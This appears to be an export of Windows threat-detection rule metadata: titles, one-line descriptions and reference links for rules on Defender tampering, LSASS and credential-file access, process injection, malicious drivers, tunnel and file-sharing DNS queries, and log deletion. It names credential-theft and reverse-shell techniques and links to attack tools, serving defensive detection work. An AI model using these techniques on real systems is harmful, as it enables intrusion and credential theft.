https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp |
Service Installation in Suspicious Folder |
Detects service installation in the suspicious AppData folder |
Internal Research |
Service Installation with Suspicious Folder Pattern |
Detects service installation with suspicious folder patterns |
Internal Research |
Suspicious Service Installation Script |
Detects suspicious service installation scripts |
Internal Research |
Potential RDP Exploit CVE-2019-0708 |
Detects a suspicious error in the RDP protocol, potentially indicating CVE-2019-0708 |
https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708, https://github.com/Ekultek/BlueKeep |
Scheduled Task Executed From A Suspicious Location |
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task |
Internal Research |
Scheduled Task Executed Uncommon LOLBIN |
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task |
Internal Research |
Important Scheduled Task Deleted |
Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
|
https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/ |
Ngrok Usage with Remote Desktop Service |
Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour |
https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://ngrok.com/ |
Windows Defender Grace Period Expired |
Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.
|
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5101, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
LSASS Access Detected via Attack Surface Reduction |
Detects Access to LSASS Process |
https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction |
PSExec and WMI Process Creations Block |
Detects blocking of process creations originating from PSExec and WMI commands |
https://learn.microsoft.com/en-us/defender-endpoint/attack-surface-reduction-rules-reference?view=o365-worldwide#block-process-creations-originating-from-psexec-and-wmi-commands, https://twitter.com/duff22b/status/1280166329660497920 |
Windows Defender Exclusions Added |
Detects the setting of Windows Defender exclusions |
https://twitter.com/_nullbind/status/1204923340810543109 |
Windows Defender Exploit Guard Tamper |
Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"
|
https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 |
Windows Defender Submit Sample Feature Disabled |
Detects disabling of the "Automatic Sample Submission" feature of Windows Defender. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware |
Windows Defender Malware And PUA Scanning Disabled |
Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
Windows Defender Malware Detection History Deletion |
Windows Defender logs when the history of detected infections is deleted. |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus, https://web.archive.org/web/20160727113019/https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e |
Windows Defender AMSI Trigger Detected |
Detects triggering of AMSI by Windows Defender. |
https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps |
Windows Defender Real-time Protection Disabled |
Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain much information on who initiated the action, you might want to reduce it to a "medium" level if it occurs too often in your environment
|
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
Windows Defender Real-Time Protection Failure/Restart |
Detects issues with Windows Defender Real-Time Protection features |
Internal Research, https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/, https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346 |
Win Defender Restored Quarantine File |
Detects the restoration of files from the defender quarantine |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide |
Windows Defender Configuration Changes |
Detects suspicious changes to the Windows Defender configuration |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide, https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware |
Microsoft Defender Tamper Protection Trigger |
Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring" |
https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection, https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide |
Windows Defender Threat Detected |
Detects actions taken by Windows Defender malware detection engines |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus |
Windows Defender Virus Scanning Feature Disabled |
Detects disabling of the Windows Defender virus scanning feature |
https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/ |
WMI Persistence |
Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. |
https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/ |
HackTool - CACTUSTORCH Remote Thread Creation |
Detects remote thread creation from CACTUSTORCH as described in references. |
https://twitter.com/SBousseaden/status/1090588499517079552, https://github.com/mdsecactivebreach/CACTUSTORCH |
HackTool - Potential CobaltStrike Process Injection |
Detects a potential remote thread creation with certain characteristics which are typical for Cobalt Strike beacons |
https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f, https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/ |
Remote Thread Created In KeePass.EXE |
Detects remote thread creation in "KeePass.exe", which could indicate potential password dumping activity |
https://www.cisa.gov/uscert/ncas/alerts/aa20-259a, https://github.com/denandz/KeeFarce, https://github.com/GhostPack/KeeThief |
Remote Thread Creation In Mstsc.Exe From Suspicious Location |
Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location.
This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.
|
https://github.com/S12cybersecurity/RDPCredentialStealer/blob/1b8947cdd065a06c1b62e80967d3c7af895fcfed/APIHookInjectorBin/APIHookInjectorBin/Inject.h#L25 |
Potential Credential Dumping Attempt Via PowerShell Remote Thread |
Detects remote thread creation by PowerShell processes into "lsass.exe" |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Password Dumper Remote Thread in LSASS |
Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.
The process in field Process is the malicious program. A single execution can lead to hundreds of events.
|
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm |
Remote Thread Creation Via PowerShell In Uncommon Target |
Detects the creation of a remote thread from a Powershell process in an uncommon target process |
https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html |
Rare Remote Thread Creation By Uncommon Source Image |
Detects uncommon processes creating remote threads. |
Personal research, statistical analysis, https://lolbas-project.github.io |
Remote Thread Created In Shell Application |
Detects remote thread creation in command shell applications, such as "Cmd.EXE" and "PowerShell.EXE".
It is a common technique used by malware, such as IcedID, to inject malicious code and execute it within legitimate processes.
|
https://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/, https://www.binarydefense.com/resources/blog/icedid-gziploader-analysis/ |
Remote Thread Creation By Uncommon Source Image |
Detects uncommon processes creating remote threads. |
Personal research, statistical analysis, https://lolbas-project.github.io |
Remote Thread Creation In Uncommon Target Image |
Detects uncommon target processes for remote thread creation |
https://web.archive.org/web/20220319032520/https://blog.redbluepurple.io/offensive-research/bypassing-injection-detection |
Remote Thread Creation Ttdinject.exe Proxy |
Detects a remote thread creation of Ttdinject.exe used as proxy |
https://lolbas-project.github.io/lolbas/Binaries/Ttdinject/ |
Creation Of a Suspicious ADS File Outside a Browser Download |
Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers |
https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/ |
Hidden Executable In NTFS Alternate Data Stream |
Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash |
https://twitter.com/0xrawsec/status/1002478725605273600?s=21 |
Suspicious File Download From File Sharing Websites - File Stream |
Detects the download of a suspicious file type from a well-known file and paste sharing domain |
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
Unusual File Download From File Sharing Websites - File Stream |
Detects the download of a suspicious file type from a well-known file and paste sharing domain |
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015, https://www.cisa.gov/uscert/ncas/alerts/aa22-321a, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/ |
HackTool Named File Stream Created |
Detects the creation of a named file stream with the imphash of a well-known hack tool |
https://github.com/gentilkiwi/mimikatz, https://github.com/topotam/PetitPotam, https://github.com/ohpe/juicy-potato, https://github.com/antonioCoco/RoguePotato, https://www.tarasco.org/security/pwdump_7/, https://github.com/fortra/nanodump, https://github.com/codewhitesec/HandleKatz, https://github.com/xuanxuan0/DripLoader, https://github.com/hfiref0x/UACME, https://github.com/outflanknl/Dumpert, https://github.com/wavestone-cdt/EDRSandblast |
Exports Registry Key To an Alternate Data Stream |
Exports the target Registry key and hides it in the specified alternate data stream. |
https://lolbas-project.github.io/lolbas/Binaries/Regedit/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Unusual File Download from Direct IP Address |
Detects the download of a suspicious file type from URLs that use a raw IP address instead of a hostname |
https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md, https://labs.withsecure.com/publications/detecting-onenote-abuse |
Potential Suspicious Winget Package Installation |
Detects potential suspicious winget package installation from a suspicious source. |
https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget |
Potentially Suspicious File Download From ZIP TLD |
Detects the download of a file with a potentially suspicious extension from a .zip top level domain. |
https://twitter.com/cyb3rops/status/1659175181695287297, https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/ |
DNS Query for Anonfiles.com Domain - Sysmon |
Detects DNS queries for "anonfiles.com", which is an anonymous file upload platform often used for malicious purposes |
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
AppX Package Installation Attempts Via AppInstaller.EXE |
Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
|
https://twitter.com/notwhickey/status/1333900137232523264, https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ |
Cloudflared Tunnels Related DNS Requests |
Detects DNS requests to Cloudflared tunnel domains.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research |
DNS Query To Devtunnels Domain |
Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed |
DNS Query To AzureWebsites.NET By Non-Browser Process |
Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
|
https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/ |
DNS Server Discovery Via LDAP Query |
Detects DNS server discovery via LDAP query requests from uncommon applications |
https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04 |
DNS HybridConnectionManager Service Bus |
Detects Azure Hybrid Connection Manager services querying the Azure service bus service |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Suspicious Cobalt Strike DNS Beaconing - Sysmon |
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
DNS Query To MEGA Hosting Website |
Detects DNS queries for subdomains related to MEGA sharing website |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
DNS Query Request By QuickAssist.EXE |
Detects DNS queries initiated by "QuickAssist.exe" to the Microsoft Quick Assist primary endpoint that is used to establish a session.
|
https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist |
DNS Query Request To OneLaunch Update Service |
Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application.
When the OneLaunch application is installed it will attempt to get updates from this domain.
|
https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf, https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/, https://malware.guide/browser-hijacker/remove-onelaunch-virus/ |
DNS Query Request By Regsvr32.EXE |
Detects DNS queries initiated by "Regsvr32.exe" |
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ |
DNS Query To Remote Access Software Domain From Non-Browser App |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution, https://redcanary.com/blog/misbehaving-rats/, https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a, https://blog.sekoia.io/scattered-spider-laying-new-eggs/, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization |
Suspicious DNS Query for IP Lookup Service APIs |
Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process. |
https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon, https://twitter.com/neonprimetime/status/1436376497980428318, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
TeamViewer Domain Query By Non-TeamViewer Application |
Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) |
https://www.teamviewer.com/en-us/ |
DNS Query Tor .Onion Address - Sysmon |
Detects DNS queries to an ".onion" address related to Tor routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
DNS Query To Ufile.io |
Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
DNS Query To Visual Studio Code Tunnels Domain |
Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration |
Malicious Driver Load |
Detects loading of known malicious drivers via their hash. |
https://loldrivers.io/ |
PUA - System Informer Driver Load |
Detects driver load of the System Informer tool |
https://systeminformer.sourceforge.io/, https://github.com/winsiderss/systeminformer |
Malicious Driver Load By Name |
Detects loading of known malicious drivers via the file name of the drivers. |
https://loldrivers.io/ |
Driver Load From A Temporary Directory |
Detects a driver load from a temporary directory |
Internal Research |
PUA - Process Hacker Driver Load |
Detects driver load of the Process Hacker tool |
https://processhacker.sourceforge.io/ |
Vulnerable Driver Load By Name |
Detects the load of known vulnerable drivers via the file name of the drivers. |
https://loldrivers.io/ |
Vulnerable HackSys Extreme Vulnerable Driver Load |
Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors |
https://github.com/hacksysteam/HackSysExtremeVulnerableDriver |
Vulnerable WinRing0 Driver Load |
Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation |
https://github.com/xmrig/xmrig/tree/master/bin/WinRing0, https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/ |
WinDivert Driver Load |
Detects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows |
https://reqrypt.org/windivert-doc.html, https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ |
Vulnerable Driver Load |
Detects loading of known vulnerable drivers via their hash. |
https://loldrivers.io/ |
Credential Manager Access By Uncommon Applications |
Detects suspicious processes, based on name and location, that access the Windows Credential Manager and vault,
which can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::cred" function.
|
https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Access To Crypto Currency Wallets By Uncommon Applications |
Detects file access requests to crypto currency files by uncommon processes.
Could indicate potential attempt of crypto currency wallet stealing.
|
Internal Research |
Access To Windows Credential History File By Uncommon Applications |
Detects file access requests to the Windows Credential History File by an uncommon application.
This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::credhist" function.
|
https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist, https://www.passcape.com/windows_password_recovery_dpapi_credhist |
Access To Windows DPAPI Master Keys By Uncommon Applications |
Detects file access requests to the Windows Data Protection API master keys by an uncommon application.
This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::masterkey" function.
|
http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords |
Access To Potentially Sensitive Sysvol Files By Uncommon Applications |
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. |
https://github.com/vletoux/pingcastle |
Microsoft Teams Sensitive File Access By Uncommon Applications |
Detects file access attempts to sensitive Microsoft Teams files (leveldb, cookies) by an uncommon process.
|
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens |
File Creation Date Changed to Another Year |
Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.
Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
|
https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html |
Unusual File Modification by dns.exe |
Detects an unexpected file being modified by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html |
Potential PrintNightmare Exploitation Attempt |
Detects DLL deletions from the Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/cube0x0/CVE-2021-1675 |
Backup Files Deleted |
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files |
EventLog EVTX File Deleted |
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence |
Internal Research |
Exchange PowerShell Cmdlet History Deleted |
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence |
https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Process Deletion of Its Own Executable |
Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
|
https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion |
IIS WebServer Access Logs Deleted |
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence |
https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html |
PowerShell Console History Logs Deleted |
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence |
Internal Research |
Prefetch File Deleted |
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence |
Internal Research, https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/ |
TeamViewer Log File Deleted |
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md |
Tomcat WebServer Logs Deleted |
Detects the deletion of Tomcat WebServer logs which may indicate an attempt to destroy forensic evidence |
Internal Research, https://linuxhint.com/view-tomcat-logs-windows/ |
File Deleted Via Sysinternals SDelete |
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. |
https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md |
Unusual File Deletion by Dns.exe |
Detects an unexpected file being deleted by dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html |
ADS Zone.Identifier Deleted By Uncommon Application |
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. |
https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/, Internal Research |
ADSI-Cache File Creation By Uncommon Tool |
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. |
https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger |
Advanced IP Scanner - File Event |
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer |
Suspicious Binary Writes Via AnyDesk |
Detects AnyDesk writing binary files to disk other than "gcapi.dll".
According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
|
https://redcanary.com/blog/misbehaving-rats/ |
Anydesk Temporary Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Assembly DLL Creation Via AspNetCompiler |
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
|
Internal Research |
BloodHound Collection Files |
Detects default file names outputted by the BloodHound collection tool SharpHound |
https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection |
EVTX Created In Uncommon Location |
Detects the creation of new files with the ".evtx" extension in non-common or non-standard locations.
This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
|
https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key |
Creation Of Non-Existent System DLL |
Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
Usually this technique is used to achieve DLL hijacking.
|
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc |
New Custom Shim Database Created |
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory, https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence, https://liberty-shell.com/sec/2020/02/25/shim-persistence/, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ |
Suspicious Screensaver Binary File Creation |
Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md |
Files With System DLL Name In Unsuspected Locations |
Detects the creation of a file with the ".dll" extension that has the name of a system DLL in uncommon or unexpected locations (outside of "System32", "SysWOW64", etc.).
It is highly recommended to perform an initial baseline before using this rule in production.
|
Internal Research |
Files With System Process Name In Unsuspected Locations |
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
It is highly recommended to perform an initial baseline before using this rule in production.
|
Internal Research |
Creation Exe for Service with Unquoted Path |
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md |
Cred Dump Tools Dropped Files |
